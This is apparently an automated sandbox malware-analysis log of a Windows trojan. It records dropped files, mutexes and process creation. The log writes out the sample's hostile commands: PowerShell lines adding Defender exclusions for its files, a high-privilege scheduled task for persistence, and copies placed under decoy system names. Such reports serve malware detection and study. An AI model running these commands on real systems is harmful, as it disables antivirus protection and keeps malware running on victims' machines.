                          Source: powershell.exe, 00000018.00000002.1940180769.000001F73C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B5E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.0000019581691000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
                          Source: powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000019.00000002.3182035697.000001B590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3076532046.000002D110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Windows\GameBarPresenceWriter\4821a341fd9e2f
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Windows\IdentityCRL\production\4821a341fd9e2f
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\CcvWVetw.log 1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
Source: UuIspZT5b6.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs UuIspZT5b6.exe
Source: UuIspZT5b6.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: UuIspZT5b6.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TyCvtMoTOGrwUAEyotiaCQmKvM.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Idle.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TyCvtMoTOGrwUAEyotiaCQmKvM.exe0.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dllhost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: UuIspZT5b6.exe, ugmVihtJuQal8ZFPFhi.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.spre.troj.expl.evad.winEXE@48/64@1/1
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Users\user\Desktop\pfMyjKNB.log
Source: C:\Recovery\dllhost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03
Source: C:\Recovery\dllhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-q0BH4m8spIw1QL7jvdW6
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Users\user\AppData\Local\Temp\j2ckjc1r
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat"
Source: UuIspZT5b6.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\UuIspZT5b6.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: UuIspZT5b6.exe ReversingLabs: Detection: 68%
Source: UuIspZT5b6.exe Virustotal: Detection: 54%
Source: C:\Users\user\Desktop\UuIspZT5b6.exe File read: C:\Users\user\Desktop\UuIspZT5b6.exe
Source: unknown Process created: C:\Users\user\Desktop\UuIspZT5b6.exe "C:\Users\user\Desktop\UuIspZT5b6.exe"
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4F01.tmp" "c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP"
Source: unknown Process created: C:\Recovery\dllhost.exe C:\Recovery\dllhost.exe
Source: unknown Process created: C:\Recovery\dllhost.exe C:\Recovery\dllhost.exe
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe'
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown Process created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
Source: unknown Process created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
Source: unknown Process created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
Source: unknown Process created: C:\Users\user\Desktop\UuIspZT5b6.exe C:\Users\user\Desktop\UuIspZT5b6.exe
Source: unknown Process created: C:\Users\user\Desktop\UuIspZT5b6.exe C:\Users\user\Desktop\UuIspZT5b6.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\dllhost.exe "C:\Recovery\dllhost.exe"
Source: unknown Process created: C:\Recovery\dllhost.exe "C:\Recovery\dllhost.exe"
Source: unknown Process created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
Source: unknown Process created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
Source: unknown Process created: C:\Users\user\Desktop\UuIspZT5b6.exe "C:\Users\user\Desktop\UuIspZT5b6.exe"
Source: unknown Process created: C:\Recovery\dllhost.exe "C:\Recovery\dllhost.exe"
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
